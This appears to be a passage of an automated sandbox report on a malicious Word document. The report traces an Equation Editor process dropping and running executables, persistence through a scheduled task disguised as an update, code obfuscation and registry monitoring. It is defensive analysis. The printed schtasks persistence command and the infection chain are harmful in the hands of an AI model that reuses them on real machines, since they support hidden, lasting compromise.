Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5A250 4_2_00D5A250
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E78 4_2_00D59E78
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5A260 4_2_00D5A260
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D59E2F 4_2_00D59E2F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52BD0 4_2_00D52BD0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D597D9 4_2_00D597D9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D52BC0 4_2_00D52BC0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D593F9 4_2_00D593F9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54F90 4_2_00D54F90
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54FA0 4_2_00D54FA0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D54B1D 4_2_00D54B1D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00450330 4_2_00450330
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00450D98 4_2_00450D98
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0040568C 7_2_0040568C
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00402296 7_2_00402296
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D5338 7_2_002D5338
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D6350 7_2_002D6350
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D5680 7_2_002D5680
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_002D208F 7_2_002D208F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045B0C8 7_2_0045B0C8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045AB48 7_2_0045AB48
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00453968 7_2_00453968
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045CB18 7_2_0045CB18
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00456DF8 7_2_00456DF8
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00451798 7_2_00451798
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00456A70 7_2_00456A70
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00459EE0 7_2_00459EE0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00455BE0 7_2_00455BE0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0045D3E0 7_2_0045D3E0
Source: ZhIOjFmINIXbKXm[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: cAFIUeWyVQPJe.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$RFQ ..doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Mutant created: \Sessions\1\BaseNamedObjects\uUxkFOSqwAhvdfFtRYTsdWC
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC8DA.tmp Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.............(................j...................................................................... Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_0136808F push es; iretd 4_2_013680A0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_004583D6 push ss; iretd 4_2_004583D7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00459CD6 push esp; retn 003Fh 4_2_00459CD7
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00457F9B push ebp; retf 4_2_00457F9F
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5B15F pushad ; iretd 4_2_00D5B163
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5B169 pushad ; iretd 4_2_00D5B16D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D55BD0 push esp; ret 4_2_00D55BD9
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4_2_00D5232C push esi; iretd 4_2_00D5232D
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0136808F push es; iretd 7_2_013680A0
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00450D48 pushad ; retf 7_2_00450D49
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00451508 pushad ; iretd 7_2_00451509
Source: initial sample Static PE information: section name: .text entropy: 7.94722535195
Source: initial sample Static PE information: section name: .text entropy: 7.94722535195
Source: initial sample Static PE information: section name: .text entropy: 7.94722535195

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File created: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
